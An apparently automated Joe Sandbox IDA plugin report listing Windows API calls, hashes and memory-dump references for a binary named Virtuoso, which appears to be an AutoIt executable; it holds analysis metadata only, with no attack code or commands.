                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 984253442-2268648507
                                                                            • Opcode ID: dc54b4686f8704179ee32cc30d7c9021d11d443be160098435ea6725a40fcabe
                                                                            • Instruction ID: 58f83974fe4456e1d80b9ec6ed68f2cf982ff85629cbb23248d40477e02849af
                                                                            • Opcode Fuzzy Hash: dc54b4686f8704179ee32cc30d7c9021d11d443be160098435ea6725a40fcabe
                                                                            • Instruction Fuzzy Hash: F641907280011ABACF15FBE0CD86EEEB378AF29340F500165F501B2092EB746F89CB61
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0020982C,?,?), ref: 0020C0C8
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C0DF
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C0EA
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C0F7
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0020C100
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C10F
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0020C118
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C11F
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C130
                                                                            • #418.OLEAUT32(?,00000000,00000000,00213C7C,?,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C149
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0020C159
                                                                            • GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C17D
                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C1A8
                                                                            • DeleteObject.GDI32(00000000,00000000,?,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C1D0
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000,00000000,?,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C1E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 2779716855-0
                                                                            • Opcode ID: 3e494b7244889ccc1549c71f1437fcc0937497b63feb3883f583db6f896c41a3
                                                                            • Instruction ID: f3591bd3dbc1c9bffa309c5bb0132eb61faa1911a7230019962fc0f61b19639c
                                                                            • Opcode Fuzzy Hash: 3e494b7244889ccc1549c71f1437fcc0937497b63feb3883f583db6f896c41a3
                                                                            • Instruction Fuzzy Hash: 0E415E71500209FFCB118F64EC8CEAEBBB9EF99711F108158F909D7291CB719981DB60
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008,00000000), ref: 0018260D
                                                                            • SetTextColor.GDI32(?,000000FF,00000000), ref: 00182617
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0018262C
                                                                            • GetStockObject.GDI32(00000005), ref: 00182634
                                                                            • GetClientRect.USER32(?), ref: 001BC0FC
                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 001BC113
                                                                            • GetWindowDC.USER32(?), ref: 001BC11F
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 001BC12E
                                                                            • ReleaseDC.USER32(?,00000000), ref: 001BC140
                                                                            • GetSysColor.USER32(00000005), ref: 001BC15E
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 3430376129-0
                                                                            • Opcode ID: ba37b0d58384107e7fcfa9442c02ae9126572a5635d2d2f083301b55134be59d
                                                                            • Instruction ID: 06ca1a6b48c5639b4d8a6bc585c8159b591232bb328d6741ac76c3effcc124c1
                                                                            • Opcode Fuzzy Hash: ba37b0d58384107e7fcfa9442c02ae9126572a5635d2d2f083301b55134be59d
                                                                            • Instruction Fuzzy Hash: FD112E31500245FFDB616F64EC4CBE97BA6EB18321F508265FA69950E1CF710991EF50
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 001F211C
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?), ref: 001F2148
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001F218A
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004,?,?,?,?,?,?,?,?,?), ref: 001F219F
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 001F21AC
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 001F21DC
                                                                            • InternetCloseHandle.WININET(00000000,0000000D,DEADBEEF,00000000,?,?,?,?,?,?,?,?,?), ref: 001F2223
                                                                              • Part of subcall function 001F2B4F: GetLastError.KERNEL32(?,?,001F1EE3,00000000,00000000,00000001), ref: 001F2B64
                                                                              • Part of subcall function 001F2B4F: SetEvent.KERNEL32(?,?,001F1EE3,00000000,00000000,00000001), ref: 001F2B79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                            • String ID:
                                                                            • API String ID: 2603140658-3916222277
                                                                            • Opcode ID: d691c8af1dffbecae46f4d4dd341c410d4bb4c105d1b5dba00cd0f156f1fe646
                                                                            • Instruction ID: ca80bb9a12a29cab060ba09a2b2af2f1accf545f8a35a844c3ebbbee7ab6282b
                                                                            • Opcode Fuzzy Hash: d691c8af1dffbecae46f4d4dd341c410d4bb4c105d1b5dba00cd0f156f1fe646
                                                                            • Instruction Fuzzy Hash: D6418DB190120CBFEB129F50DC89FFB7BACEF18354F108116FA059A191DBB49E458BA5
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 001821B8
                                                                            • GetWindowRect.USER32(?,?), ref: 001821F9
                                                                            • ScreenToClient.USER32(?,?), ref: 00182221
                                                                            • GetClientRect.USER32(?,?), ref: 00182350
                                                                            • GetWindowRect.USER32(?,?), ref: 00182369
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$Screen
                                                                            • String ID:
                                                                            • API String ID: 1296646539-0
                                                                            • Opcode ID: c9f116efbd71734d28bd9d407f35702e40a76f874dcb4f9aafdfc5cffa893216
                                                                            • Instruction ID: b7c4795862bd60af28d3c2bf46d4fbe7cb0e30b78fef58e2527b3ccaf238f20b
                                                                            • Opcode Fuzzy Hash: c9f116efbd71734d28bd9d407f35702e40a76f874dcb4f9aafdfc5cffa893216
                                                                            • Instruction Fuzzy Hash: 02B16A39A00249DBDF14DFA8C9847EEB7B1FF08310F148129ED59AB654EB74AA50CF64
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 001F6159
                                                                            • GetForegroundWindow.USER32 ref: 001F6170
                                                                            • GetDC.USER32(00000000), ref: 001F61AC
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 001F61B8
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 001F61F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: 7c1c54c7b87022efa9614d9f94c9c283fe954a8f43fe351b2108a7a1bcc536b8
                                                                            • Instruction ID: 4788a9d179756a425484d26de0aab4c4da72f1ff1aa59df0d0e162c067f1ce4f
                                                                            • Opcode Fuzzy Hash: 7c1c54c7b87022efa9614d9f94c9c283fe954a8f43fe351b2108a7a1bcc536b8
                                                                            • Instruction Fuzzy Hash: 49219F75A00604AFD704EF65DC88AAABBF9EF98310F04C469F94AD7252CF70AD40CB90
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0020826F
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0020827D
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00208284
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 4014797782-2298589950
                                                                            • Opcode ID: 43400e7518117f2f1e70f84aa66ecd833989d764f84787dd481fca32e70c967a
                                                                            • Instruction ID: 333c9c036c2827ae2633955ec1c12d17ae876b5a02ac4af72f48261340df9d6f
                                                                            • Opcode Fuzzy Hash: 43400e7518117f2f1e70f84aa66ecd833989d764f84787dd481fca32e70c967a
                                                                            • Instruction Fuzzy Hash: 0021BCB5610209AFDB10DF24DCC5DA737ACEB6A354B040059FA109B392CB70EC21DBA0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime__swprintf
                                                                            • String ID: %.3d$WIN_XPe
                                                                            • API String ID: 2070861257-2409531811
                                                                            • Opcode ID: 874894caaa7a9c756a0a79910272ca8f2f7156ed3baba9b668a288f50ff1fcc1
                                                                            • Instruction ID: 9ed4ad28c084bc496565d153c96232c1fcd90c7eaf1695c1dfe3c05a7d691d4f
                                                                            • Opcode Fuzzy Hash: 874894caaa7a9c756a0a79910272ca8f2f7156ed3baba9b668a288f50ff1fcc1
                                                                            • Instruction Fuzzy Hash: A3D01271818108EAC70E9A90D845FF9737CAB6C340F224156F506A2040D735C7A89B26
                                                                            APIs
                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00213C4C,?), ref: 001D8308
                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00213C4C,?), ref: 001D8320
                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00210988,000000FF,?,00000000,00000800,00000000,?,00213C4C,?), ref: 001D8345
                                                                            • _memcmp.LIBCMT ref: 001D8366
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                            • String ID:
                                                                            • API String ID: 314563124-0
                                                                            • Opcode ID: fa21da6565f0fc69e1e481c2b0fa6ad3c229a13c450046fe378bc25e71ac4a09
                                                                            • Instruction ID: 78dd4aaa251c9192bd9e72d3f05c7bc9c1f3d5100c94a829af8d9eed9cd3a1ec
                                                                            • Opcode Fuzzy Hash: fa21da6565f0fc69e1e481c2b0fa6ad3c229a13c450046fe378bc25e71ac4a09
                                                                            • Instruction Fuzzy Hash: 6C812A71A00109EFCB04DFD4C988EEEB7B9FF89715F204599E506AB250DB71AE46CB60
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 001E416D
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 001E417B
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 001E419B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 001E4245
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 420147892-0
                                                                            • Opcode ID: 92c097a5d4cc2354cc04773d1da9791079f26420d685a9ac218df7d9dce936e0
                                                                            • Instruction ID: 69683bbcecb6adc8e44b3a13a1f60f5836ffe3794a726de10d83dff89ecb2164
                                                                            • Opcode Fuzzy Hash: 92c097a5d4cc2354cc04773d1da9791079f26420d685a9ac218df7d9dce936e0
                                                                            • Instruction Fuzzy Hash: 6D31B671108342AFD704EF51E885AAFBBE8BFA5350F50052DF585C31A1EBB19989CB52
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,00182004), ref: 0018214F
                                                                            • GetStockObject.GDI32(00000011,00000000,?,00000096,?,00182004,?,?,static,00210980,?,?,?,00000096,00000096,?), ref: 00182163
                                                                            • SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,00182004,?,?,static,00210980,?,?,?,00000096,00000096), ref: 0018216D
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                            • String ID:
                                                                            • API String ID: 3970641297-0
                                                                            • Opcode ID: cd101dad35a6d4c0b7060e56b9d10b06416aed24effd6e1c118e292b276ee40f
                                                                            • Instruction ID: c3183f56cf079da4aac2071bcdec60523882fe091f23f5712fcfeac900a85428
                                                                            • Opcode Fuzzy Hash: cd101dad35a6d4c0b7060e56b9d10b06416aed24effd6e1c118e292b276ee40f
                                                                            • Instruction Fuzzy Hash: DE118B7210124DBFDB039FA0AC88EEABB69EF69354F154112FA0452064CB71DDA1AFA0
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 0018E01E
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0018E037
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: 87686bd77bb7f5b750879b25fb134be131996b3253b51af847915178d5b05eeb
                                                                            • Instruction ID: 0a4a5e6352c9a7286077a0eb45b2f4b4850021f28388ca94207aea22a768140b
                                                                            • Opcode Fuzzy Hash: 87686bd77bb7f5b750879b25fb134be131996b3253b51af847915178d5b05eeb
                                                                            • Instruction Fuzzy Hash: 57514A714087459BE320AF50E885BAFB7F8FF94714F51894DF1D8411A1EF709529CB16
                                                                            APIs
                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?,?,?,?), ref: 00208186
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0020819B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            • Opcode ID: 066d61fd337cb1bff8940b09a483fff51df064ab3b80718073c4d2c6314486bd
                                                                            • Instruction ID: ab6dc6563d12705421c4d9e1eae33d6d23c0bed5d41638295086b200ccb0966b
                                                                            • Opcode Fuzzy Hash: 066d61fd337cb1bff8940b09a483fff51df064ab3b80718073c4d2c6314486bd
                                                                            • Instruction Fuzzy Hash: 69412A74A1030A9FDB14CF64D881BDABBB5FF09300F10056AE958EB392DB70A956CF90
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 001F4132
                                                                              • Part of subcall function 00191A36: _memmove.LIBCMT ref: 00191A77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: __snwprintf_memmove
                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                            • API String ID: 3506404897-2584243854
                                                                            • Opcode ID: e6c0d87f52dc043e2c3d9a3bf4c5b7a68eacaeef79badb56d3f3e337798a7db7
                                                                            • Instruction ID: 018f67e257ce0e7060c8e486f84e492a5ebcf3a2ba00bfedf81bbe46ba08852f
                                                                            • Opcode Fuzzy Hash: e6c0d87f52dc043e2c3d9a3bf4c5b7a68eacaeef79badb56d3f3e337798a7db7
                                                                            • Instruction Fuzzy Hash: 8E21D070A0021DAFCF04EFA4C892EBE77B5EF65740F440065FA05A7281DB30EA85CBA1